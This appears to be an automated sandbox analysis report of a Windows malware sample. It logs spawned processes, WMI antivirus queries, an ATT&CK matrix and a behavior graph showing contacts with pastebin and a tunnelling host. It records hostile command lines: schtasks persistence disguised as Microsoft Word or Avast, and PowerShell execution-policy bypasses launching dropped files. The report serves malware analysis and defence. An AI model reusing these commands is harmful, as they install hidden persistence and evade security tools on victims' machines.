Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Avast Antivirus" /tr "C:\Users\user\xdwdPutty.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo 5 /tn "Google Drive" /tr "C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe" /RL HIGHEST Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exitJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess created: C:\Users\user\xdwdPutty.exe "C:\Users\user\xdwdPutty.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "OpenOffice" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" & exit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Azure DevOps" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" /RL HIGHEST & exit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Corel PaintShop Pro" /tr "C:\Users\user\Videos\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: unknown unknown
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "OpenOffice" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe"'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Azure DevOps" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\xdwdPutty.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Azure DevOps" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c scHTaSks /Run /I /TN "Avast Antivirus"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe scHTaSks /Run /I /TN "Avast Antivirus"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\xdwdPutty.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c scHTaSks /Run /I /TN "Avast Antivirus"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe scHTaSks /Run /I /TN "Avast Antivirus"
Source: C:\Users\user\xdwdPutty.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: ptKNiAaGus.exe, 00000000.00000002.3338723647.000000001D661000.00000004.00000020.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3348366187.000000001C010000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
Source: pto2q1ow.nf5.exe, 00000013.00000002.3350908929.000000001E1BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Pong<@>40atus<@>Program Manager/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0agJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL
Source: pto2q1ow.nf5.exe, 00000013.00000002.3350908929.000000001E17E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Pong<@>41atus<@>Program Manager
Source: pto2q1ow.nf5.exe, 00000013.00000002.3350908929.000000001E17E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Pong<@>41atus<@>Program Manager/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0agJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL
Source: ptKNiAaGus.exe, 00000000.00000002.3338723647.000000001D661000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager@
Source: pto2q1ow.nf5.exe, 00000013.00000002.3350908929.000000001E1BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Pong<@>40atus<@>Program Manager
Source: ptKNiAaGus.exe, 00000000.00000002.3338723647.000000001D661000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerTcpi@.g
Source: ptKNiAaGus.exe, 00000000.00000002.3338723647.000000001D661000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager /b !g
Source: ptKNiAaGus.exe, 00000000.00000002.3338723647.000000001D661000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerTcpip_{AC25AD1E-4879-4C9B-BB59-E50724EBEC23}\Device\Tcpip_{60B2689F-C8F6-4D1B-8ED3-6BD4DA58F33E}\Device\Tcpip_{68C65ED0-D5FC-471F-BF0F-95C04D2E3B08}Mo
Source: C:\Users\user\Desktop\ptKNiAaGus.exeQueries volume information: C:\Users\user\Desktop\ptKNiAaGus.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeQueries volume information: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe VolumeInformation
Source: C:\Users\user\xdwdPutty.exeQueries volume information: C:\Users\user\xdwdPutty.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeQueries volume information: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe VolumeInformation
Source: C:\Users\user\xdwdPutty.exeQueries volume information: C:\Users\user\xdwdPutty.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeQueries volume information: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe VolumeInformation
Source: C:\Users\user\xdwdPutty.exeQueries volume information: C:\Users\user\xdwdPutty.exe VolumeInformation
Source: C:\Users\user\Desktop\ptKNiAaGus.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: ptKNiAaGus.exe, 00000000.00000002.3315461823.0000000000C05000.00000004.00000020.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000011.00000002.1175503015.0000000001490000.00000004.00000020.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000011.00000002.1198001960.000000001C007000.00000004.00000020.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3315892006.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3346481631.000000001B90E000.00000004.00000020.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1174194771.000000000135C000.00000004.00000020.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1190784165.000000001BD6A000.00000004.00000020.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1191163974.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1258532267.0000000000ED9000.00000004.00000020.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1286934423.0000000000F6C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\ptKNiAaGus.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\ptKNiAaGus.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\xdwdPutty.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\xdwdPutty.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\xdwdPutty.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts331
Windows Management Instrumentation		1
DLL Side-Loading		1
DLL Side-Loading		1
Disable or Modify Tools		OS Credential Dumping2
File and Directory Discovery		Remote Services1
Archive Collected Data		1
Web Service		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Native API		1
Scheduled Task/Job		12
Process Injection		1
Obfuscated Files or Information		LSASS Memory123
System Information Discovery		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Scheduled Task/Job		31
Registry Run Keys / Startup Folder		1
Scheduled Task/Job		1
Software Packing		Security Account Manager441
Security Software Discovery		SMB/Windows Admin SharesData from Network Shared Drive11
Encrypted Channel		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts2
PowerShell		Login Hook31
Registry Run Keys / Startup Folder		1
Timestomp		NTDS2
Process Discovery		Distributed Component Object ModelInput Capture1
Non-Standard Port		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets251
Virtualization/Sandbox Evasion		SSHKeylogging2
Non-Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts121
Masquerading		Cached Domain Credentials1
Application Window Discovery		VNCGUI Input Capture3
Application Layer Protocol		Data Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Modify Registry		DCSync1
System Network Configuration Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job251
Virtualization/Sandbox Evasion		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
Process Injection		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1466956 Sample: ptKNiAaGus.exe Startdate: 03/07/2024 Architecture: WINDOWS Score: 100 118 pastebin.com 2->118 120 q-policies.gl.at.ply.gg 2->120 122 icanhazip.com 2->122 140 Snort IDS alert for network traffic 2->140 142 Antivirus detection for dropped file 2->142 144 Multi AV Scanner detection for submitted file 2->144 148 9 other signatures 2->148 12 ptKNiAaGus.exe 18 8 2->12         started        17 xdwdMicrosoft Paint.exe 2 2->17         started        19 xdwdPutty.exe 2->19         started        21 2 other processes 2->21 signatures3 146 Connects to a pastebin service (likely for C&C) 118->146 process4 dnsIp5 124 q-policies.gl.at.ply.gg 147.185.221.18, 44998, 49735, 49740 SALSGIVERUS United States 12->124 126 pastebin.com 104.20.3.235, 443, 49734, 49742 CLOUDFLARENETUS United States 12->126 128 icanhazip.com 104.16.185.241, 49739, 49744, 80 CLOUDFLARENETUS United States 12->128 116 C:\Users\user\xdwdPutty.exe, PE32 12->116 dropped 162 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 12->162 164 Creates an undocumented autostart registry key 12->164 166 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 12->166 170 5 other signatures 12->170 23 cmd.exe 1 12->23         started        26 cmd.exe 1 12->26         started        28 cmd.exe 12->28         started        40 12 other processes 12->40 168 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 17->168 30 xdwdPutty.exe 17->30         started        32 cmd.exe 17->32         started        34 cmd.exe 19->34         started        36 cmd.exe 21->36         started        38 cmd.exe 21->38         started        file6 signatures7 process8 signatures9 150 Suspicious powershell command line found 23->150 44 2 other processes 23->44 152 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 26->152 154 Bypasses PowerShell execution policy 26->154 156 Uses schtasks.exe or at.exe to add and modify task schedules 26->156 46 2 other processes 26->46 48 2 other processes 28->48 158 Antivirus detection for dropped file 30->158 160 Queries memory information (via WMI often done to detect virtual machines) 30->160 42 cmd.exe 30->42         started        50 2 other processes 32->50 52 3 other processes 34->52 54 2 other processes 36->54 56 2 other processes 38->56 58 20 other processes 40->58 process10 process11 60 schtasks.exe 42->60         started        62 conhost.exe 42->62         started        64 pto2q1ow.nf5.exe 44->64         started        68 z4wwumki.3zg.exe 48->68         started        70 Conhost.exe 58->70         started        72 Conhost.exe 58->72         started        74 Conhost.exe 58->74         started        file12 76 Conhost.exe 60->76         started        112 C:\...\xdwdMicrosoft PowerPoint Host.exe, PE32 64->112 dropped 130 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 64->130 132 Creates an undocumented autostart registry key 64->132 134 Creates multiple autostart registry keys 64->134 136 Drops large PE files 64->136 78 cmd.exe 64->78         started        80 